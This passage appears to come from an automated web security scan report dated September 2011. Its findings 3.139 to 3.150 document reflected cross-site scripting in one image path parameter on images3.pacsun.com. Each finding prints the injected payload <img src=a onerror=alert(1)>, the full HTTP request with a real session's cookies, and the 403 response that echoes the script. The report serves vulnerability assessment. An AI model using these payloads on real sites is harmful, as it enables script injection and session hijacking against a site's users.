User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:05 GMT
Connection: close

Unable to find /pacsunproducts/8177750_013b1e3<img src=a onerror=alert(1)>4fa5924f20c

3.139. http://images3.pacsun.com/is/image/pacsunproducts/8184954_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8184954_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c989f<img%20src%3da%20onerror%3dalert(1)>b103b4531c7 was submitted in the REST URL parameter 4. This input was echoed as c989f<img src=a onerror=alert(1)>b103b4531c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8184954_01c989f<img%20src%3da%20onerror%3dalert(1)>b103b4531c7?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:52 GMT
Connection: close

Unable to find /pacsunproducts/8184954_01c989f<img src=a onerror=alert(1)>b103b4531c7

3.140. http://images3.pacsun.com/is/image/pacsunproducts/8198103_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8198103_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 33297<img%20src%3da%20onerror%3dalert(1)>decb9bf7941 was submitted in the REST URL parameter 4. This input was echoed as 33297<img src=a onerror=alert(1)>decb9bf7941 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8198103_0133297<img%20src%3da%20onerror%3dalert(1)>decb9bf7941?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:07 GMT
Connection: close

Unable to find /pacsunproducts/8198103_0133297<img src=a onerror=alert(1)>decb9bf7941

3.141. http://images3.pacsun.com/is/image/pacsunproducts/8202103_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8202103_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5bcee<img%20src%3da%20onerror%3dalert(1)>c14eea029ba was submitted in the REST URL parameter 4. This input was echoed as 5bcee<img src=a onerror=alert(1)>c14eea029ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8202103_015bcee<img%20src%3da%20onerror%3dalert(1)>c14eea029ba?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:15 GMT
Connection: close

Unable to find /pacsunproducts/8202103_015bcee<img src=a onerror=alert(1)>c14eea029ba

3.142. http://images3.pacsun.com/is/image/pacsunproducts/8203333_01_001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8203333_01_001

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 90828<img%20src%3da%20onerror%3dalert(1)>fe6a2201130 was submitted in the REST URL parameter 4. This input was echoed as 90828<img src=a onerror=alert(1)>fe6a2201130 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8203333_01_00190828<img%20src%3da%20onerror%3dalert(1)>fe6a2201130?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:53 GMT
Connection: close

Unable to find /pacsunproducts/8203333_01_00190828<img src=a onerror=alert(1)>fe6a2201130

3.143. http://images3.pacsun.com/is/image/pacsunproducts/8203333_sw_001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8203333_sw_001

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e3b3c<img%20src%3da%20onerror%3dalert(1)>13da9e9c6eb was submitted in the REST URL parameter 4. This input was echoed as e3b3c<img src=a onerror=alert(1)>13da9e9c6eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8203333_sw_001e3b3c<img%20src%3da%20onerror%3dalert(1)>13da9e9c6eb?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:52 GMT
Connection: close

Unable to find /pacsunproducts/8203333_sw_001e3b3c<img src=a onerror=alert(1)>13da9e9c6eb

3.144. http://images3.pacsun.com/is/image/pacsunproducts/8203333_sw_004 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8203333_sw_004

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8700b<img%20src%3da%20onerror%3dalert(1)>bdffb2a02a2 was submitted in the REST URL parameter 4. This input was echoed as 8700b<img src=a onerror=alert(1)>bdffb2a02a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8203333_sw_0048700b<img%20src%3da%20onerror%3dalert(1)>bdffb2a02a2?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:53 GMT
Connection: close

Unable to find /pacsunproducts/8203333_sw_0048700b<img src=a onerror=alert(1)>bdffb2a02a2

3.145. http://images3.pacsun.com/is/image/pacsunproducts/8203333_sw_014 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8203333_sw_014

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 64f02<img%20src%3da%20onerror%3dalert(1)>b6c57a1461e was submitted in the REST URL parameter 4. This input was echoed as 64f02<img src=a onerror=alert(1)>b6c57a1461e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8203333_sw_01464f02<img%20src%3da%20onerror%3dalert(1)>b6c57a1461e?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:53 GMT
Connection: close

Unable to find /pacsunproducts/8203333_sw_01464f02<img src=a onerror=alert(1)>b6c57a1461e

3.146. http://images3.pacsun.com/is/image/pacsunproducts/8212524_01_001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8212524_01_001

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2ee25<img%20src%3da%20onerror%3dalert(1)>3b765dcf0f was submitted in the REST URL parameter 4. This input was echoed as 2ee25<img src=a onerror=alert(1)>3b765dcf0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8212524_01_0012ee25<img%20src%3da%20onerror%3dalert(1)>3b765dcf0f?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 88
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:22 GMT
Connection: close

Unable to find /pacsunproducts/8212524_01_0012ee25<img src=a onerror=alert(1)>3b765dcf0f

3.147. http://images3.pacsun.com/is/image/pacsunproducts/8227621_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8227621_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7774f<img%20src%3da%20onerror%3dalert(1)>c982e7ff168 was submitted in the REST URL parameter 4. This input was echoed as 7774f<img src=a onerror=alert(1)>c982e7ff168 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8227621_017774f<img%20src%3da%20onerror%3dalert(1)>c982e7ff168?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:15 GMT
Connection: close

Unable to find /pacsunproducts/8227621_017774f<img src=a onerror=alert(1)>c982e7ff168

3.148. http://images3.pacsun.com/is/image/pacsunproducts/8232514_01_001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8232514_01_001

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a1360<img%20src%3da%20onerror%3dalert(1)>b908ff5f0c7 was submitted in the REST URL parameter 4. This input was echoed as a1360<img src=a onerror=alert(1)>b908ff5f0c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8232514_01_001a1360<img%20src%3da%20onerror%3dalert(1)>b908ff5f0c7?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:15 GMT
Connection: close

Unable to find /pacsunproducts/8232514_01_001a1360<img src=a onerror=alert(1)>b908ff5f0c7

3.149. http://images3.pacsun.com/is/image/pacsunproducts/8250979_01_003 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8250979_01_003

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2691d<img%20src%3da%20onerror%3dalert(1)>ff0958088bd was submitted in the REST URL parameter 4. This input was echoed as 2691d<img src=a onerror=alert(1)>ff0958088bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8250979_01_0032691d<img%20src%3da%20onerror%3dalert(1)>ff0958088bd?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:08 GMT
Connection: close

Unable to find /pacsunproducts/8250979_01_0032691d<img src=a onerror=alert(1)>ff0958088bd

3.150. http://images3.pacsun.com/is/image/pacsunproducts/8260952_01_001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8260952_01_001

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1cace<img%20src%3da%20onerror%3dalert(1)>1bd330bfb20 was submitted in the REST URL parameter 4. This input was echoed as 1cace<img src=a onerror=alert(1)>1bd330bfb20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8260952_01_0011cace<img%20src%3da%20onerror%3dalert(1)>1bd330bfb20?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
